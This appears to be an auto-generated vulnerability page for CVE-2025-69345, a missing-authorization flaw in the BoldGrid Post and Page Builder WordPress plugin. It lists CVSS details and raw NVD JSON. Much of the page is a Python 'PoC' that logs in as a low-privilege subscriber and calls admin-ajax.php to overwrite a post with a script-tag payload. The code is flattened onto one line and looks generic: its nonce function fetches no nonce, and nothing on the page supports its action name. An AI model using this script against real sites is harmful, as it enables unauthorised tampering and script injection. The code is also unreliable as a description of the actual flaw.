Security Vulnerability Report
中文
CVE-2025-69345 CVSS 4.3 MEDIUM

CVE-2025-69345

Published: 2026-01-06 17:15:47
Last Modified: 2026-04-27 21:16:25
Source: [email protected]

Description

Missing Authorization vulnerability in BoldGrid Post and Page Builder by BoldGrid post-and-page-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post and Page Builder by BoldGrid: from n/a through <= 1.27.9.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BoldGrid Post and Page Builder by BoldGrid <= 1.27.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69345 PoC - BoldGrid Post and Page Builder Broken Access Control # This PoC demonstrates how a low-privilege user can perform admin-level actions TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" # Low privilege account PASSWORD = "password123" def get_nonce_and_cookie(): """Login and get necessary authentication tokens""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data) if response.status_code == 200: return session.cookies.get_dict() return None def exploit_broken_access_control(cookies): """Exploit the missing authorization vulnerability""" # Target the AJAX endpoint that lacks proper authorization exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Malicious payload to create/modify content without proper authorization exploit_data = { 'action': 'boldgrid_post_builder_save', 'post_id': '1', 'post_content': '<script>alert("XSS via Broken Access Control")</script>', 'post_title': 'Compromised via CVE-2025-69345' } response = requests.post(exploit_url, data=exploit_data, cookies=cookies) return response.status_code == 200 and 'success' in response.text def main(): cookies = get_nonce_and_cookie() if cookies: if exploit_broken_access_control(cookies): print("[+] Exploitation successful - Access control bypass confirmed") print("[+] Low-privilege user can now perform admin actions") else: print("[-] Exploitation failed") else: print("[-] Authentication failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69345", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:46.987", "lastModified": "2026-04-27T21:16:24.547", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in BoldGrid Post and Page Builder by BoldGrid post-and-page-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post and Page Builder by BoldGrid: from n/a through <= 1.27.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-and-page-builder/vulnerability/wordpress-post-and-page-builder-by-boldgrid-plugin-1-27-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.